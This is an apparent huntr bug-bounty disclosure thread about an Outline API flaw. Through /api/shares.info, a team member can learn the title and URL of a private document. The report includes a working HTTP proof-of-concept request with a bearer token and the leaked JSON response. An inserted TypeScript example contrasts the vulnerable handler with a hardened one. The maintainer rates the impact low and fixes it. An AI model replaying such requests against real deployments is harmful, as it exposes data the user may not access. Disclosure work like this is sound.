unprivileged user can get document details in outline/outline

Valid

Reported on

Jul 1st 2022


Description

Unprivileged user can see document details of any document.

Proof of Concept

1. From the admin account, add a new user called user-B with the member role.

2. Now from the admin account, create a private collection and don't share it with any member. Set the permission below for this collection:

Default Access --> No access

3. Now from the admin account, add a new document to this collection. So, user-B should not see this document's details.
Let's assume the documentId of this document is 1ad60950-9e50-4316-8cd9-6f4ff49d7f31.

4. Now from user-B's account, send the request below to get the details of this document:

POST /api/shares.info HTTP/1.1
Host: myacc.getoutline.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 68
X-Editor-Version: 12.0.0
Origin: https://myacc.getoutline.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImMzYTRjNzdhLWY4YjctNDJkMy05MjZhLTQzNWY3OTQ5ZDkwZSIsInR5cGUiOiJzZXNzaW9uIiwiaWF0IjoxNjU2Njg0Njg1fQ.UmVUcAfPXqhWuGI_i8qZemBwDpN5nZN6tovq_sMPnIA
Te: trailers
Connection: close
ACCOUNT: TEST2

{"documentId":"1ad60950-9e50-4316-8cd9-6f4ff49d7f31","apiVersion":4}

Here, replace documentId with the documentId above.
You can give the documentId of any private-collection document of any user.

Response:


{
  "data": {
    "id": "ec76aaf3-815d-4db8-a177-c5b4e124172c",
    "documentId": "1ad60950-9e50-4316-8cd9-6f4ff49d7f31",
    "documentTitle": "dcco2",
    "documentUrl": "/doc/dcco2-MphGaOA1Ls",
    "published": false,
    "url": "https://myacc.getoutline.com/share/ec76aaf3-815d-4db8-a177-c5b4e124172c",
    "createdBy": {
      "id": "09da9275-6dbc-48cd-9026-a3dc255c441c",
      "name": "myname",
      "avatarUrl": "https://outline-production-attachments.s3-accelerate.amazonaws.com/avatars/09da9275-6dbc-48cd-9026-a3dc255c441c/86867337-db3f-4713-97aa-505fa51be224",
      "color": "#9E5CF7",
      "isAdmin": true,
      "isSuspended": false,
      "isViewer": false,
      "createdAt": "2022-07-01T13:34:59.700Z",
      "updatedAt": "2022-07-01T19:40:32.477Z",
      "lastActiveAt": "2022-07-01T19:40:32.477Z"
    },
    "includeChildDocuments": false,
    "createdAt": "2022-07-01T16:39:48.101Z",
    "updatedAt": "2022-07-01T19:43:44.866Z"
  },
  "policies": [
    {
      "id": "ec76aaf3-815d-4db8-a177-c5b4e124172c",
      "abilities": {
        "read": true,
        "update": true,
        "revoke": false
      }
    }
  ],
  "status": 200,
  "ok": true
}

Impact

An unprivileged user can get details of any document of any user using the documentId.
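The bug class in this report is an object lookup that checks only whether a Share record exists and never asks whether the caller may read the underlying document. The following is an added example, not Outline's code and not the commit referenced later in this thread: it models the report's setup (a private collection with "Default Access --> No access", a document shared by the admin, and a team member who is not in the collection) in memory and runs a vulnerable share-info handler beside a hardened one. All names (Store, canReadDocument, findShare, sharesInfoVulnerable, sharesInfoHardened) and all IDs are constructed for the example.

```typescript
// Added example, not Outline's code. Models the authorization gap described in
// the report over an in-memory store; every type, function and ID is invented.

type User = { id: string; teamId: string };
type Collection = {
  id: string;
  teamId: string;
  defaultAccess: "read" | "none"; // "none" models "Default Access --> No access"
  memberIds: Set<string>;         // users explicitly granted access
};
type Doc = { id: string; title: string; urlPath: string; collectionId: string; parentDocumentId?: string };
type Share = { id: string; documentId: string; published: boolean };
type Store = { collections: Map<string, Collection>; documents: Map<string, Doc>; shares: Share[] };
type ShareInfo = { shareId: string; documentTitle: string; documentUrl: string; published: boolean };

class HttpError extends Error {
  constructor(readonly status: number, message: string) { super(message); }
}

// A user may read a document when they are on the collection's team and are
// either an explicit member or the collection grants default read access.
function canReadDocument(store: Store, user: User, doc: Doc): boolean {
  const collection = store.collections.get(doc.collectionId);
  if (!collection || collection.teamId !== user.teamId) return false;
  return collection.memberIds.has(user.id) || collection.defaultAccess === "read";
}

// Walk from the document up through its parents until a Share record is found
// (the maintainer's condition: the document or one of its parents has a Share).
function findShare(store: Store, documentId: string): Share | undefined {
  let current = store.documents.get(documentId);
  while (current !== undefined) {
    const id = current.id;
    const share = store.shares.find((s) => s.documentId === id);
    if (share) return share;
    current = current.parentDocumentId ? store.documents.get(current.parentDocumentId) : undefined;
  }
  return undefined;
}

function toInfo(store: Store, share: Share): ShareInfo {
  const doc = store.documents.get(share.documentId)!;
  return { shareId: share.id, documentTitle: doc.title, documentUrl: doc.urlPath, published: share.published };
}

// Vulnerable shape: only the existence of a Share record is checked, so any
// team member who knows the documentId learns the title and URL path.
function sharesInfoVulnerable(store: Store, _caller: User, documentId: string): ShareInfo {
  const share = findShare(store, documentId);
  if (!share) throw new HttpError(404, "share not found");
  return toInfo(store, share);
}

// Hardened shape: authorize the caller against the document before any share
// data is assembled. Absent and forbidden documents get the same 404 so the
// endpoint does not confirm that a remembered or leaked UUID is still live.
function sharesInfoHardened(store: Store, caller: User, documentId: string): ShareInfo {
  const doc = store.documents.get(documentId);
  if (!doc || !canReadDocument(store, caller, doc)) throw new HttpError(404, "not found");
  const share = findShare(store, documentId);
  // The share may hang off a parent; authorize that document too, since its title is returned.
  if (!share || !canReadDocument(store, caller, store.documents.get(share.documentId)!)) {
    throw new HttpError(404, "not found");
  }
  return toInfo(store, share);
}

// Constructed scenario mirroring the report: private collection, no default
// access, a document shared by the admin, and a member outside the collection.
function buildReportScenario(): { store: Store; admin: User; userB: User; documentId: string } {
  const admin: User = { id: "admin-0000", teamId: "team-1" };
  const userB: User = { id: "user-b-0000", teamId: "team-1" };
  const documentId = "doc-00000000-0000-0000-0000-000000000001"; // made-up ID
  const store: Store = {
    collections: new Map<string, Collection>([
      ["col-1", { id: "col-1", teamId: "team-1", defaultAccess: "none", memberIds: new Set([admin.id]) }],
    ]),
    documents: new Map<string, Doc>([
      [documentId, { id: documentId, title: "dcco2", urlPath: "/doc/dcco2-example", collectionId: "col-1" }],
    ]),
    shares: [{ id: "share-0000", documentId, published: false }],
  };
  return { store, admin, userB, documentId };
}

// Calls both handlers as user-B (and the hardened one as admin) and reports
// what each disclosed or the status it failed with.
function compareHandlers(): { vulnerableTitle: string | null; hardenedStatus: number; adminTitle: string | null } {
  const { store, admin, userB, documentId } = buildReportScenario();
  const call = (fn: typeof sharesInfoVulnerable, u: User) => {
    try { return { info: fn(store, u, documentId), status: 200 }; }
    catch (e) { return { info: null, status: e instanceof HttpError ? e.status : 500 }; }
  };
  const vuln = call(sharesInfoVulnerable, userB);
  const hard = call(sharesInfoHardened, userB);
  const adminView = call(sharesInfoHardened, admin);
  return {
    vulnerableTitle: vuln.info ? vuln.info.documentTitle : null, // "dcco2" leaks to user-B
    hardenedStatus: hard.status,                                 // 404 for user-B
    adminTitle: adminView.info ? adminView.info.documentTitle : null, // admin still reads it
  };
}
```

The ordering in the hardened handler is the point: the authorization decision is made on the document the caller named, before the share is even looked up, and the forbidden case is indistinguishable from the not-found case. That removes both the title/URL disclosure and the weaker oracle of learning that a once-seen documentId still exists.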

We are processing your report and will contact the outline team within 24 hours. a year ago
We have contacted a member of the outline team and are waiting to hear back a year ago
Tom Moor
a year ago

Maintainer


So, the reproduction steps are:

  • The attacker must be on the same team
  • The document or one of its parents must have a Share record in the database
  • The attacker must guess or otherwise obtain a UUID

The data that's leaked is just the document name and url path. The user information doesn't really count because you're already on the same team and can access that irregardless.

Does that sound right?

ranjit-git
a year ago

Researcher


The attacker must be on the same team

yes


The document or one of its parents must have a Share record in the database

Yes, but this document is private. This document was created under a private collection by admin and the collection has no other user/group assigned to it. Only admin has permission in this collection, and Default Access --> No Access is set for this collection.


The attacker must guess or otherwise obtain a UUID

Guessing the ID is not possible because it is a long hash value.
There are two ways that the attacker can get the UUID:
1. Previously, admin assigned/shared this document with the attacker. The attacker had permission at that time and wrote down the documentId. After that, admin revoked the attacker's access to this document.
So, the attacker does not have permission to access this document but already has the documentId.
2. The documentId is leaked and the attacker got that documentId.



The data that's leaked is just the document name and url path. The user information doesn't really count because you're already on the same team and can access that irregardless

Yes, the data leaked are the document title and URL.
If admin modified the document title, then using this bug the attacker can get the document title or URL.

ranjit-git modified the report
a year ago
Tom Moor
a year ago

Maintainer


Okay, so TLDR:

If you've had access to a document before and held onto the ID then once you no longer have access you can use the API directly to find out any changes to the title.

ranjit-git
a year ago

Researcher


Yes. Leaked data are only the title and share URL.

We have sent a follow up to the outline team. We will try again in 7 days. a year ago
Tom Moor modified the Severity from Medium to Low a year ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Tom Moor validated this vulnerability a year ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
ranjit-git
a year ago

Researcher


Does this bug not have any security impact?

Tom Moor
a year ago

Maintainer


It's a good find and definitely a bug in the logic here, but the real-life impact is pretty much negligible.

ranjit-git
a year ago

Researcher


@maintainer so this report does not qualify for bounty reward?

We have sent a fix follow up to the outline team. We will try again in 7 days. a year ago
Tom Moor
a year ago

Maintainer


I don't know how the bounty amount works, I marked it as valid

ranjit-git
a year ago

Researcher


@maintainer If you directly mark the report as Low or None then it does not reward bounty.
But if you mark the report as Low by calculating CVSS score then it gives bounty.

Let me know if this report should deserve a bounty or not.

ranjit-git
a year ago

Researcher


@maintainer Bounties are assigned according to report severity and paid by the huntr team.
Here is the bounty table:

High ---> $900   Medium ---> $300   Low ---> $100

Tom Moor marked this as fixed in 0.65.0 with commit da4a10 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
shares.ts#L55-L307 has been validated
shares.ts#L2-L49 has been validated
shares.test.ts#L10-L736 has been validated
ranjit-git
a year ago

Researcher


@maintainer so this report does not qualify for bounty reward?
